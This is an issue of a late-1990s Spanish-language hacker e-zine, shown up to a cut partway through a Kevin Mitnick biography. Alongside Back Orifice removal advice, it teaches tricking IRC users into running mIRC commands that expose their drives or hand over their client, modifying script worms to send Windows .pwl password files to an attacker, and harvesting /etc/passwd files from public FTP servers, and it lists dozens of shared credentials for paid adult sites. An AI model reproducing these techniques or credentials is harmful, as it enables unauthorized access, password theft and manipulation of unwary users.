«««««««««««««««««««««««««
                « ZeD-wOrLd-EzInE num.4 «
                «««««««««««««««««««««««««


Una vez mas estoy aqui con todos vosotros,espero que la corta
(al menos en mi opinion) espera que os he hecho sufrir aya merecido
la pena y cojais este nuevo numero con ganas.
Cada vez son mas personas las que colaboran con este vuestro e-zine
(gracias a dios,jeje).
Bueno me dejo de royos y os dejo con los contenidos de este numero 4.
byez.

Si quieres colaborar con el e-zine mandame tu documento en formato TXT a:
                          [email protected]

Distribuidores oficiles del ezine:
ZeD-wOrLd-----http://www.angelfire.com/ak/HACKZED/ZED2.html
La casa de LordVader-----(web no disponible momentaneamente)
El rincon del Dr.CyBeR----http://personales.mundivia.es/pedroj52
HaCk`S-wEb-RiNg (la web oficial)-----http://come.to/HaCkS-wEb-RiNg


colaboradores de este numero:
ToMaCHeLi--------http://members.tripod.com/~tomacheli
Dr.CyBeR---------http://personales.mundivia.es/pedroj52
[]KHAN[]---------┐?┐?┐?┐?┐?┐?┐┐?┐?┐?┐?┐?┐?┐?┐?┐?┐?┐?┐?┐

LiNks InTeReSaNtEs-----
http://raregazz.acapulco.uagro.mx (raregazz)
http://come.to/HaCkS-wEb-RiNg  (web oficial del grupo latino HaCk`S-wEb-RiNg)
http://members.tripod.com/~newkers (web del grupo THE NEWKERS)

[[[[[[[[[[[[[[[[[ZeD-wOrLd-EzInE numero 4]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]

         ««««««««««««««««««««««««««««««««««««««««««««««««
         «                 NOTA:                        «
         « aunque lo digo en todos los numeros,me gusta «
         « repetirlo,todo lo que esta en este,como en   «
         « otros numeros atrasados,es meramente         «
         « educativo,no incito a nadie a usar lo que se «
         « brinda aqui,ademas algunos de estos textos   «
         « han sido copiados de otros autores y/o       «
         « traducidos por mi,si un texto es tullo y no  «
         « quieres que este aqui,dimelo y lo quitare de «
         « la edicion de este numero inmediatamente     «
         ««««««««««««««««««««««««««««««««««««««««««««««««


[[[[[[[[[[[[[[[[[ZeD-wOrLd-EzInE numero 4]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]


contenidos de este numero------------------------------------------------------------

1.Breve introduccion de el realizador del e-zine (osea yo)
2.Contenidos (osea esto que estas leyendo)
3.Maneras de colarse (y prevenirse) en un HD atraves del IRC (por:ToMACHeLi y ZeD)
4.Uso del FTP para obtener ficheros de password (por el Dr.CyBeR)
5.Tipos de hackers (opinion personal)(por:ZeD)
6.Listado de passwords XxX
7.Historia "del chacal de la red" (Kevin Mitnick)(sacado de RAREGAZZ)
8.Segunda parte del curso de antivirus
9.Hacking a Scytale (por: []KHAN[])
10.Troyanos (Netbus)(por: []KHAN[])
11.Noticias
12.Despedida y cierre

--------------------------------------------------------------------------------------

[[[[[[[[[[[[[[[[[ZeD-wOrLd-EzInE numero 4]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]




                  0101010101010101010101010101010101010101
                  ú MANERAS DE COLARSE (y prevenirse) EN ú
                  ú       UN HD ATRAVES DEL IRC          ú
                  0101010101010101010101010101010101010101

                  POR: ToMaCHeLi--(http://members.tripod.com/~tomacheli)

                           Y

                          ZeD------(http://www.angelfire.com/ak/HACKZED/ZED2.html)

                        MIEMBROS DEL HaCk`S-wEb-RiNg--(http://come.to/HaCkS-wEb-RiNg)


╞╞╞╞╞╞╞╞╞╞╞╞╞╞
INTRODUCCION ╞
╞╞╞╞╞╞╞╞╞╞╞╞╞╞

Devido al creciente aumento de maneras que existen de entrar y/o controlar
computadoras ejenas atraves del irc,nos hemos decidido a escribir este articulo
para la raregazz.
En el trataremos de explicar las formas que hay para introducirse,controlar....
un ordenador de forma remota atraves del irc.
Si quieres comentarnos algo,aqui tienes nuestros mails
[email protected]
     [email protected]

╞╞╞╞╞╞╞╞╞╞╞╞╞╞╞╞╞╞╞╞╞╞╞
FIN D LA INTRODUCCION ╞
╞╞╞╞╞╞╞╞╞╞╞╞╞╞╞╞╞╞╞╞╞╞╞


               BACK ORIFICE.
--------------------------------------

El Back Orifice lo creo no hace demasiado tiempo un grupo de hackers americanos
con el fin de poder entrar en cualquier ordenador sabiendo tan solo la IP del
usuario.
Si te mandan un .EXE    NO LO EJECUTES A MENOS QUE ESTES COMPLETAMENTE SEGURO DE LO QUE
ES.

Muchas personas estan propagando por inet el programa SERVER de
diversas maneras (lo mas extendido es por el IRC). Y aqui entra en papel el
ignorante internauta que se dedica a ejecutarlo en su maquina creyendo que
que es un autoextractor de fotos X :). Una vez ejecutado íSORPRESA!, el
archivo desaparece ┐?┐?┐? otia ┐?┐?┐?, y la pobre victima piensa, (bah, me
habra llegado defectuoso el archivo), y no le da importancia.
Si, pues chaval FELICIDADES acabas de meter un troyano en tu sistema
:), cualquiera que sepa tu IP podra hacer en tu PCera casi lo que le de la
gana. Tas cubierto de gloria :)) (mas bien de mierda que OTROS te han tirao
encima).

El troyano en cuestion funciona de la siguiente manera:
cuando ejecutas el .EXE este instala un programa que se llama (espacio).exe
y borra el ejecutable que te han pasado.
Cada vez que reinicies tu windo2 (solo funciona en este sistema)el troyano se
auntoinstalara y se cargara en memoria (osea que olvidate de borrar el archivo
(espacio).exe,por que no funcionara).
El troyano deja abierto un puerto en tu sistema LIBRE DE CUALQUIER PROTECCION.
este es un puerto llamado "31173" (sin comillas)(31173=elite)
Atraves de un programa que debe tener la persona que quiere acceder a tu computadora,
este accedera directamente a tu c:\ atraves de unos comandos muy simples,pudiendo
hacer lo que le de la gana dentro de tu ordenador,subir y bajar archivos,abrir
mas puertos,ajecutar programas,incluso formatear el disco duro.
Si notas que te esta pasando alguna de estas cosas lo que puedes hacer es lo
siguiente:
desconectate de internet y procede a borrar el troyano de la siguiente manera:

Pa que lo pilles rapido, el archivo se mueve del directorio donde esta y va a
parar al directorio :\windows\system convertido en (espacio).exe y ademas en
el editor registros (REGEDIT), carpeta RunServices (puede ser que este en
otra carpeta) se incorpora la siguiente linea en DATOS: "(espacio).exe", para
que nada mas arrancar el ventanucos el troyano quede en memoria. Y diras
bah, pos entonces borro el archivo (espacio).exe y yasta.
       Si hijo si, prueba y veras, ni flowers, al tenerlo en memoria no deja
borrarlo. Y entonces??, a jodese jejeje.
       NO, TRANQUILO HAY UNA SOLUCION (por lo menos a mi me va).
       Pero eso te lo dire mas adelante, ahora sigue leyendo....


┐Como puedo saber si tengo el troyano en el sistema?
----------------------------------------------------
       La manera mas facil que hay es utilizar el programa CLIENT (cliente)
apuntando a la direccion IP 127.0.0.1 que es tu propia maquina, no se precisa
que estes conectado a inet. Cuando ya hallas apuntado a esta IP, desde el
cliente de BO manda un PING, si no te responde nada, vale estas limpio y no
tienes el troyano, pero si te pone algo como esto:

------- Packet received from 127.0.0.1 port 31337 -------
 !PONG!1.20!DEFAULT!
------- End of data -------

Opssss, estas jodio, tan colao el troyano...

*****************************************************************************

Nota: Si no lo tienes en el sistema puedes metertelo y probar las maravillas
     y putadas que te pueden hacer los demas (haciendotelas a ti mismo) ;)
     y sin ningun peligro al no estar conectado a inet.

*****************************************************************************


Vale lo tengo y estoy muy asustao ┐como co±o me lo quito?
---------------------------------------------------------

       Puede que algunos ya lo hallais descubierto, para mi fue facil, la
verdad. Ya sabemos que al ejecutar el archivo del SERVER, este se convierte
en (espacio).exe y va a parar al directorio :\windows\system. (OJO, hay una
manera de configurar este nombre y es posible que no siempre el troyano sea
el (espacio).exe)
       Vale, como he dicho antes si intentas borrarlo, nanai, por que ya
esta en memoria, asi que lo mas normal es pensar que puede haber una linea
donde hace que se ejecute el troyano en el archivo SYSTEM.INI o WIN.INI
al iniciar el ventanucos. Pos fui a buscarlo por alli y NOP nada de nada, lo
siguiente que pense es buscarlo en el editor de registros (REGEDIT), pos
palli voy, en el menu pincho: EDICION/BUSCAR/ pongo (espacio).exe y activo
CLAVES, VALORES y DATOS y íTACHAN! en una carpeta llamada RunServices (sigo
diciendo que puede estar en otra carpeta) aparece en DATOS el nombre del
archivito íYA LO TENEMOS! solo queda eliminar la linea de DATOS para ello
pincha donde pone el NOMBRE (suele ser (predeterminado)) y eliminalo, (la
carpeta no la borres) una vez eliminado ya puedes cerrar la ventana del
editor de registros (Nota: es posible que en la busqueda aparezcan mas
(espacio).exe pero solo debes borrar el de la carpeta RunServices o otras
en las que pueda estar y sepas que es la que carga el troyano).
       Con todo esto hemos conseguido que la proxima vez que iniciemos el
ventanucos no se cargue en memoria el troyano, con lo que ya podras ir al
directorio :windows\system y borrar el archivo (espacio).exe (no lo vuelvas
a ejecutar o se te metera otra vez en el registro). Y por fin te has librado
del troyano.

Existen programas que dicen borrar este troyano,pero ES MENTIRA la mayoria
(si no todos)llevan alguna clase de virus dentro,osea que cambiaras este
virus por otro,por lo que no habras logrado mucho :(


     SCRIPTS.
-------------------

Para alguien que sepa scripting le puede resultar muy sencillo controlar tu maquina
de forma remota atraves del irc,ya que en algo que puede resultar tan inocente
como una opcion para mandar un privado,puede esconder algun comando para que si
el esta conectado automaticamente le mandes tu preciado archivo de contrase±as o lo
que se le venga en gana en ese momento.
Te recomendamos que pilles algun manual de scripting (en INet los hay a patadas)
te lo empolles y revises el codigo del script que usas abitualmente,no sea que
resulte que cada vez que pides la lista de canales del servidor donde estes
estes mandando un archivo a una persona que no quieres que lo tenga.
Procura buscar comandos como los siguientes:

/send c:\windows\*.pwl cualquier_nick_que_haya_puesto

/fserve nick_que_haya_puesto 5 c:

o cosas de este estilo que te puedan parecer sospechosas.
Estos comandos pueden estar puestos de la siguiente manera
Ejemplos:

pidiendo la lista de canales:
/list /send c:\windows\*.pwl nick_al_que_llegara_el_archivo

entrando a un canal:
/join #$$?="Entrar en el canal?" /fserve nick_al_que_daras_acceso 5 c:

recibiendo un texto (si ponen una determinada frase/palabra en un canal o privado)
on *:TEXT:!mandameloya*:#:/dcc send archivo_que_quiera_que_le_llegue $nick " $+ %file $+ "
| /inc %fsendp | ignore -tacu5 $wildsite

Como puedes ver,estos comandos remotos pueden estar en cualquier sitio del script,
para localizarlos lo mas eficiente es buscarlos en la opcion de STATUS,MENUBAR y REMOTE
ya que es hay donde suele aver mas cantidad de comandos y es donde es mas dificil de
encontrar el comando remoto que hace que lo pases tan mal cuando estas conectado al irc


   VIRUS DE IRC.
--------------------

Si ya sabemos que esto esta + visto que el tebeo,pero es otra manera +
┐nunca se te ha ocurrido investigar estos famosos "virus"?
pues a mi si,fijate  :o)

Si investigas un poco dentro del "script.ini" veras que lo que hace es lo siguiente:
esta configurado para que cada vez que entres a un canal le mandes a todos los que
estan dentro de ese canal el fichero "script.ini" ┐pero y si reconfiguramos el
"script.ini" para que en vez de mandarselo a todo el canal solo le mande a una
persona en concreto el famoso "pwl"?
esto no es muy dificil de hacer si revisas el codigo del "script.ini" y cambias unos
pocos parametros (hay que saber algo de scripting).

En el caso del "dmsetup.exe" es algo mas peculiar.
El archivo en cuestion es un binario (un ejecutable),por lo tanto tendras que saber
programar en el lenguaje que esta echo para poder modificarlo a tu gusto.
Detodas maneras el "virus" sin modificar ya es una jodienda de por si,lo que hace
es lo siguiente:

tiene la particularidad de ser "autoejecutable" osea que no hace falta que lo
clikees tu para que este se instale en tu maquina :(
Modifica algunas lineas del script.ini para que se autoenvie (igual que el "script.ini")
Algunas de las versiones estudiadas actuan con mas particularidad e incluyen
pautas para desconectar a un usuario si recibe la frase "tis to I who seem so sad"
(sin comillas claro).

Crea copias de si mismo en los directorios c:\windows y c:\mirc (precavido el jeje)
Intenta sobreescribir el autoexec.bat para restaurar copias de si mismo cada vez que
se reinicie la computadora y por si eso fuera poco encima cambia los directorios de
los fserve por c:\mirc lo que puede ser una putada si guardas logs con contrase±as
o algo asi en alguno de los subdiretorios de esta carpeta.

Eliminar estos dos archivos es algo relativamente simple:
para el script.ini:

en la linea donde escribes normalmete en el mirc pon lo siguiente:
"/unload -rs script.ini" (sin las comillas obviamente)
lo que consigues con esto es descargar de la memoria del programa este archivo,pero cuando
lo vuelvas a utilizar este se volvera a cargar en memoria,para elimirarlo lo que deves
hacer cuando descarges de la memoria el archivo es lo siguiente:
donde escribes normalente en el mirc escribe esto: "/removescript.ini" (sin las comillas)
y ya estara borrado el "virus"
Para el "dmsetup.exe" la cosa cambia un poco:
Cierra todos los programas  que tengas abiertos,localiza todos los dmsetup.exe que tengas
en tu sistema (con la opcion de buscar del menu "inicio" te sera muy facil) y borralos
todos,revisa los ficheros "config.sys" y "autoexec.bat" y si tienes dudas sobre alguna
linea,sustituye ambos por copias de seguridad.
┐Que no tienes una copia de seguridad?┐pero en que estabas pensando cuando el win2 te dijo
que era recomendable hacer un disco de arranque?
Luego reinicia el equipo y reinstala el mirc,si sigues sufriendo anomalias a la hora hacer
funcionar este programa reinstala el win2 (hazlo encima del que tienes,no hace falta formatear)


 ATRAVES DE LA LINEA DE COMANDOS.
---------------------------------------

Para esto es necesario que usen ingeniaria social con tigo (no te vamos a explicar lo
que es la ingenieria social por que es algo sobradamente conocido).

Existen una serie de comandos que si los introduces en donde normalmente escribes puedes
dejar que el otro controle tu programa del Mirc o que le des acceso a tu c:\ pudiendo
hacer los que le venga en gana con el.

/fserve su_nick 5 c:

/fserve= comando para abrirle una sesion de server al otro usuario
su_nick= aqui se pone el nick de la otra persona
5= cantidad de ficheros que puede bajar
c:= directorio a partir del que le das acceso

Este comando lo que hace es dar acceso completo a tu c:\ (o la carpeta que especifiques)
Podra subir,bajar,borrar...ficheros,la unica restriccion que pones es la carpeta
apartir de la que tiene acceso,y el numero de archivos que puede bajar.
Ademas cuando pones este comando te saldra una ventana (en ingles) diciendote lo que
estas haciendo (pero la mayoria de las veces la gente pasa de leerla)

ctcp 1:*:$1-
Este comando, introducido en los ctcp┤s de mIRC, ejecuta cualkier orden
de forma remota.Es como el antiguo /ctpc nick DO.
ctcp ==> Client-To-Client-Protocol. Los version, ping, etc...
1    ==> nivel de usuario que ejecuta el ctcp.
*    ==> como en DOS, comodin que sustituye al ctcp que nos hagan. Podriamos
definir aqui un VERSION PING, etc..
$1-  ==> con este parametro, mirc toma en consideracion todo lo que nos envien.

┐Mu bonito verdad? pero te estaras preguntando ┐y como coñe se usa? pos mu simple:
Hemos conseguido que el pavo introduzca este comando y estamos en el canal
#me_mola con el y me apetece que me de OP en este canal,pues ponemos lo siguiente
"/ctcp su_nick mode #me_mola +o nuestro_nick" (sin comillas)
y bingo,ya tenemos op en el canal #me_mola,pero claro el tio dice "co±o si yo a este no
le he dado op" y se mosquea osea que este es un buen momento para hacer un "automass deop"
┐que no sabes como hacerlo? pos en la mayoria de los scripts (un poco modernos)
tienes una opcion para hacerlo, "pero esque yo no uso ningun script"
┐pero tu en que mundo vives tio? en http://www.welcome.to/100scripts tienes una coleccion de
ellos muy grande,bajate alguno + rapido que inmediatamente :)
(si es el ZeD-wOrLd-ScRiPt mejor,jeje)
"Bueno pero yo no quiero que me de OP lo que quiero es desconectarle del irc"
Bueno pues en ese caso ponlo siguiente:
"/ctcp nick_del_personaje quit FRASE QUE TE APETEZCA QUE DIGA AL DESCONECTARSE"
(sin las comillas)
"┐Y si quiero que diga algo sin que lo escriba?" pues pon esto:
"/ctcp nick_del_personaje say FRASE QUE QUIERES QUE DIGA" (sin las comillas)
Tienes que tener cuidado con esta clase de "ataques" por que al tio en cuestion
se le llenara la ventana de "status" de mensajes diciendole quien sois.
Bueno supongo que el concepto lo habreis pillado puesto que es muy simple.

Bueno esto es una pequeña muestra de como controlar,colarse...etc... atraves de
algo tan usado como es el irc,pero para muchas de estas cosas tienes que elejir a
alguien que sea un pardillo en esto del irc,pero los hay,valla si los hay ;)

byez

[[[[[[[[[[[[[[[[[ZeD-wOrLd-EzInE numero 4]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]



            ################################################
            ### USO DEL FTP PARA OBTENER FICHEROS PASSWD ###
            ################################################
                  By: DrCyber
              e-mail: [email protected]
              WEB: http://personales.mundivia.es/pedroj52

               Al acceder a un servidor via FTP, lo que hace este servidor
es darnos los ficheros que contiene, y entre todos esos ficherillos esta el
mas buscado, el fichero de passwd.
       Como ahora no hay ""objetivo"" a la vista de nuestros ojos, puedes
buscar uno en el siguiente buscador: http://ftpsearch.ntnu.no  esta es la WEB
del Fast FTP Search v3.7, bueno pues escribid en la casilla de "search for"
el fichero a buscar, (podeis probar a escribir passwd) y pulsad sobre "search"
hay teneis un monton de ficheros, estudiadlo detenidamente, y daros cuenta que
hay teneis ficheros, directorios etc.
Los tipos de ficheros pueden ser:

-: file  (fichero)
d:  (directorio)

A partir de si es fichero o directorio, empezamos con los permisos de usuario,
los permisos pueden ser:

r: Readable (Lectura)
w: Writeable (escritura)
x: eXcutable (ejecutable)

Bueno ahora volvemos atras con nuestra navegata y escribimos lo mismo de antes
pero en la casilla de "limit to path" escribimos "etc" (no comillas claro. 8-D)

¿ Para que ?
de este modo nos va a buscar los ficheros passwd del directorio etc.
pero claro, atencion, el directorio etc colgara del raiz ¿ verdad ?
NO PROBLEMO....
Vamos a afinar la busqueda, volvemos al navegata y por ejemplo le vamos a decir
que nos busque dentro de Francia, para ello, en la casilla "limit to domain"
escribimos fr, de esta forma en el nombre del servidor ha de aparecer fr, que
corresponde a los servidores Franceses (digo Gabachos.. 8-D)
y ahora con lo que nos salga -- Bingo !! Ya tenemos el fichero passwd en su
lugar correcto, bien, ahora probemos probemos a ver lo que contienen.....
Si las claves del fichero estan shadow despedoiros de ese servidor, pero eso
es que el fichero elegido ocupa poco, busca los que mas ocupen, asi la info
sera mas jugosilla, cuando pilles el fichero que te ineterese, grabalo a tu
HD, y no se te olvide apuntar la url del servidor de donde salio...

       Bueno esto es todo, recordad que todo esto es mera informacion, con
       ello no se incita a nadie a llevar a cabo actos delictivos o que le
       pueden traer problemas, el autor no se hace responsable de nada...

[[[[[[[[[[[[[[[[[ZeD-wOrLd-EzInE numero 4]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]



                       µµµµµµµµµµµµµµµµµµµ
                       ñ TIPOS DE HACKERSñ
                       µµµµµµµµµµµµµµµµµµµ

documento escrito por ZeD.
Puedes subir este documento a tu web,bbs,ftp.....
siempre y cuando mantengas este encabezado
┐dudas?┐comentarios?┐sujerencias?
[email protected]

http://www.angelfire.com/ak/HACKZED/ZED2.html
miembro del HaCk`S-wEb-RiNg (http://come.to/HaCkS-wEb-RiNg)

------------------------------COMIENZA EL TEXTO-------------------------------------------------

Bueno puede que alomejor esto no sea lo que esperes que sea,me explico.
Existen muchos documentos explicando las diferencias que existen entre
un hacker,un carcker....┐pero te has parado a pensar las clases de hackers
que hay?.
Pr que aunque no lo creas,dentro del mundo del hacking existen muchos tipos
de hackers,no todos se dedican a entrar en sistemas.
(que conste que este documento es una opinion propia,cada uno que piense lo
que quiera)

En mi opinion lostipos que exsisten son los siguientes:

hackers:
son los quetodoel mundo conoce y admira,las personas que tienen la "facilidad"
de entrar donde quieran para aprender de ese sistema,copiar archivos
(nunca destruirlos),y luego (la mayoria lo hacen) informar al responsable
del sistema de los fallos que tiene.

hackers de SOs:
los hackers de SOs se dedican a averiguar todos los trucos,secretos,fallos....
de un sistema oprativo.
puedes pensar lo siguiente -si solo se limitana eso... ┐que es lo que hackean?-
la respuesta es simple,┐acaso hackear no es averiguar lo + posible del sistema
para poder saber los fallos que tiene,para poder entrar?.
bien pues creo que te he contestado a tu pregunta ┐no?
ademas,sacr los trucos del SO para personalizarlo al maximo,es una manera
de trucar el sistema,por lo tanto HACKEARLO.

hackers de IRC:
eston la mayoria de las veces son lo que llamamos lamers.
la gran parte de las veces esto es cierto,pero no siempre.
en mi opinion un hacker de IRC,es alguien que sabe conseguir lo que se proponga
siempre y cuando este dentro de este mundo; contrase±as,op,acceder a otra computadora
+ de lo que le permite ese usuario....

en mi opinion a los que se dedican a este mundo (que al fin y al cabo no esta tan alejado
del mundo del hacking) no deveria de considerarseles LAMERS,puesto que hay que aprender
muchos comandos,tacticas,trucos y sobre todoconocer los fallos que puedan tener,
sino todos,la mayoria de los scripts que circulan por la red.
con estonoestoy defendiendo a los lamers,pero tampoco les critico
son jente que aun queriendo ser un hacker,les gusta que se lo den todo echo,
estola gran parte de las veces es devido a que en el mundo de la informatica
han crecido con el win2 o sea "instalar y listo",a esa jente les recomiendo
que se expandan,que dejen un poco de lado al win2 y se instalen LINUX
para que vean que en el mundo de la informatica,no todo es PUG & PLAY.

hackers programadores:
que te creias┐que todos los que hacen programas para hackear o crackear,entran en sistemas?
pues no amiguito mio :) de eso nada
muchos de los programadores que hacen programas para averiguar claves,escanear puertos,
crear diccionarios....etc,no los usan simplemente hacen los programas (aunque suene raro
es asi)


Bueno pues esto son solo algunos ejemplos para quete hagas a la idea de que,en el mundo del
hacking,no todo es entrar en un sistema,se pueden hacer muchas otras cosas que sin
duda(al menos para mi) ayudan mucho a este mundo en constante desarroyo
Aunque ultimamente parece estar de moda ser hacker,aprender a entrar en ordenadores para
borrar archivos y meter virus,las cosas no son asi.
Si de verdad quieres ser un hacker,no hace falta que entres en un sistema y le formatees
el HD con un troyano para que yo te considere un hacker,al contrario para mi esa jente
son los DELINCUENTES que dan mala fama a las personas que entran,miran y se van
y asa jente es a la que yo llamo DELINCUENTE,por que en el fondo lo son,si deverdad quieres ser
un hacker no hagas cosas que produzcan desastres en computadoras,es mas priductivo
que informes al administrador del sistema de los fallos que tiene y con eso ganaras
como minimo mi respeto y seguro que el de mucha mas jente que opina como yo.

Con esto no pretendo convencer a nadie,simplemente es una opinion reflejada en un documento
que puede servir para que mucha jente se de cuenta,que hay mucha diferencia entre un
hacker y otro,aunque a ambos se les llame igual,muchas veces no los son.
----------------------------FINALIZA EL TEXTO----------------------------------------------------
ZeD
http://www.angelfire.com/ak/HACKZED/ZED2.html
miembro del HaCk`S-wEb-RiNg (http://come.to/HaCkS-wEb-RiNg)

[[[[[[[[[[[[[[[[[ZeD-wOrLd-EzInE numero 4]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]



              {{{{{{{{{{PASWORDS XxXxXxX}}}}}}}}}}}}}}}

NOTA:si alguno de estos passwords falla,no te extra±es,las contrase±as las cambian muy
amenudo,por lo tanto no me mandes e-mails dciendome que las direccion no funcionan


http://www.lovezoo.com/members/zoo/
login:bimbo
pass:bimbo

http://www.shockingteens.com/members/shockingteens/
login:batcave
Pass:batcave

http://www.100sex.com/members/showcase/showcase2.html
L:access P:hyt66 ver:Sep 19, 98

http://www.111sexstreet.com/private/sex02.html
L:youcantget P:ridofagentx ver:Sep 19, 98

http://www.111sexstreet.com/private/sex02.html L:gigi P:1234 ver:Sep 19, 98

http://www.111sexstreet.com/private/sex02.html L:rrrr P:rrrr ver:Sep 19, 98

http://www.18hardcore.com/MEMBERS/mpics/barely18.htm L:none P:none ver:Sep 19, 98

http://www.200pix.com/members/ L:guest P:guest ver:Sep 19, 98

http://www.200pix.com/members/ L:test P:account ver:Sep 19, 98

http://www.2sexy.com/members/membersindex.html L:madeline P:madeline ver:Sep 19, 98

http://www.40plus50plus.com/members/news.html L:alonso P:alonso ver:Sep 19,98

http://www.69time.com/hardsex/index.html L:bobbijo P:bobbijo ver:Sep 19, 98

http://www.adrianna.com/private/gallery.htm L:alley P:cat ver:Sep 19, 98

http://www.adult-perversions.com/members/ L:godflesh P:coolie292 ver:Sep 19, 98

http://www.adult-perversions.com/members/ L:dera123 P:towed972 ver:Sep 19, 98

http://www.adult-perversions.com/members/ L:younger P:editor563 ver:Sep 19,98

http://www.allthatass.com/private-club/allthatass-index.html L:deep P:throat ver:Sep 19, 98

http://www.angelsweb.com/members/mmain.htm L:qwerty P:ytrewq ver:Sep 19, 98

http://www.aphouse.com/frames/subscribers/sub_index.html L:nikki P:nikki ver:Sep 19, 98

http://www.aphouse.com/frames/subscribers/sub_index.html L:aaaaa P:aaaaa ver:Sep 19, 98

http://www.appetite4sex.com/members/index.html L:topgun P:topgun ver:Sep 19, 98

http://www.appetite4sex.com/members/index.html L:elvis P:elvis ver:Sep 19, 98

http://www.ayana.com/private/ L:frown P:mom ver:Sep 19, 98

http://www.backdoorbimbos.com/members/index.html L:anonymous P:anonymous ver:Sep 19, 98

http://www.backdoorbimbos.com/members/index.html L:bim P:bo ver:Sep 19, 98

http://bserver.amkingdom.com/protected/mea1x.htm L:evan P:nine ver:Sep 19, 98

http://www.bunsoffun.com/members/index.html L:new P:spanky ver:Sep 19, 98

http://www.califbodies.com/members/index.html L:xxlustyxx P:lusty ver:Sep 19, 98

http://www.celebritypornostars.com/private/gallery.html L:marzbarz P:fastporn ver:Sep 19, 98

http://www.celebritypornostars.com/private/gallery.html L:letmein P:letmein ver:Sep 19, 98

http://www.centerfoldgold.com/members/index.shtml L:billy P:billy ver:Sep 19, 98

http://www.centerfoldgold.com/members/index.shtml L:55555 P:12345 ver:Sep 19, 98

http://www.hornybitches.com/payed L:peru P:peru ver:Sep 19, 98

http://hot4you.netaxs.com/members L:gary P:mysmut ver:Sep 19, 98

http://www.hotbody.com/members L:good4 P:1234 ver:Sep 19, 98

http://www.hotbody.com/members L:good6 P:1234 ver:Sep 19, 98

http://www.hotbody.com/members L:good5 P:1234 ver:Sep 19, 98

http://www.inter-racial.com/membersdmr/ L:eric P:eric ver:Sep 19, 98

http://www.inter-racial.com/membersdmr/ L:scott P:scott ver:Sep 19, 98

http://www.inter-racial.com/membersdmr/ L:raven P:raven ver:Sep 19, 98

http://www.internationalspice.com/members/ L:rammelzee P:dondi ver:Sep 19, 98

http://www.itsreal.com/members/ L:1 P:1 ver:Sep 19, 98

http://www.itsreal.com/members L:patti P:patti ver:Sep 19, 98

http://www.itsreal.com/members L:special1 P:special ver:Sep 19, 98

http://www.itsreal.com/members/ L:micky P:micky ver:Sep 19, 98

http://www.itsreal.com/members/ L:doggie P:doggie ver:Sep 19, 98

http://www.itsreal.com/members/ L:noah P:noah ver:Sep 19,98

http://www.itsreal.com/members L:haze P:haze ver:Sep 19, 98

http://www.itsreal.com/members/ L:elle P:elle ver:Sep 19,98

http://www.itsreal.com/members/ L:cola P:cola ver:Sep 19,98

http://www.itsreal.com/members/ L:pablo P:pablo ver:Sep 19, 98

[[[[[[[[[[[[[[[[[ZeD-wOrLd-EzInE numero 4]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]

                    ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
                    │                                  │
                    │ La Historia del Chacal de la Red │
                    │                                  │
                    ▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀

      NOTA DE LA REDACCION (osea de ZeD):
Este texto lo he bajado de la web oficial de RAREGAZZ,a la cual podeis hacceder
desde esta direccion:
http://raregazz.acapulco.uagro.mx



Como Hacker la carrera de Kevin Mitnick comenzo a los 16 a±os, cuando
-obsesionado por las redes de computadoras- rompio la seguridad del sistema
administrativo de su colegio.

Escrito por: Gilberto Pagua

Mr. Mitnick.

Todo aquel que sea conceptualizado como un Internauta se caracteriza por
utilizar un telefono, un modem y una computadora para muchos fines
diferentes: Divertirnos, informarnos, estudiar, cocinar, planificar viajes
y otras actividades que amplian nuestro quehacer diario. Para Kevin Mitnick
el quehacer diario en sus ultimos diez a±os fue el explorar y "explotar"
computadoras ajenas y sistemas telefonicos. ┐Su profesion? "Hacker" de
nacimiento.

Este "terrorista electronico", como lo cataloga el Departamento de Justicia
de los Estados Unidos, conocido en los medios como el "Condor", fue capaz de
crear numeros telefonicos imposibles de facturar (para la compa±ia
telefonica el era James Bond, con un numero que terminaba en 007), pudo
apropiarse de 20.000 numeros de tarjetas de credito de habitantes de
California y burlarse del FBI por mas de dos a±os con solo un telefono
celular alterado y un computador portatil.

Es la peor pesadilla de las empresas de telefonia. Es sospechoso de robar el
software de mas de media docena de fabricantes de telefonos celulares y
tenia el control de tres oficinas centrales de telefonos en Manhattan y de
todos los centros de conmutacion de California, dandole la habilidad de
escuchar cualquier conversacion telefonica o, si no eras una persona de su
agrado, modificar el telefono de tu casa de tal manera que, cada vez que
levantaras el auricular, una grabadora pedia que depositaras 25 centavos.

┐Como se forma un Hacker?

Como Hacker, la carrera de Mitnick tiene sus inicios en 1980 cuando apenas
contaba 16 a±os y, obsesionado por las redes de computadoras, rompio la
seguridad del sistema administrativo de su colegio, pero no para alterar sus
notas, lo hizo "solo para mirar". Su bautizo como infractor de la ley fue en
1981. Junto a dos amigos entro fisicamente a las oficinas de COSMOS de
Pacific Bell. COSMOS (Computer System for Mainframe Operations) era una base
de datos utilizada por la mayor parte de las compa±ias telefonicas
norteamericanas para controlar el registro de llamadas. Una vez dentro de
las oficinas obtuvieron la lista de claves de seguridad, la combinacion de
las puertas de acceso de varias sucursales y manuales del sistema COSMOS. La
informacion robada tenia un valor equivalente a los 200 mil dolares. Fueron
delatados por la novia de uno de los amigos y debido a su minoria de edad
una Corte Juvenil lo sentencio a tres meses de carcel y a un a±o bajo
libertad condicional.

Luego de cumplido el periodo de tres meses el oficial custodio encargado de
su caso encontro que su telefono fue desconectado y que en la compa±ia
telefonica no habia ningun registro de el.

Sus objetivos iban creciendo a cada paso y en 1982 entro ilegalmente, via
modem, a la computadora del North American Air Defense Command en Colorado.
Antes de entrar altero el programa encargado de rastrear la procedencia de
las llamadas y desvio el rastro de su llamada a otro lugar. El FBI, creyendo
que habia hallado a Mitnick, allano la casa de unos inmigrantes que estaban
viendo television.

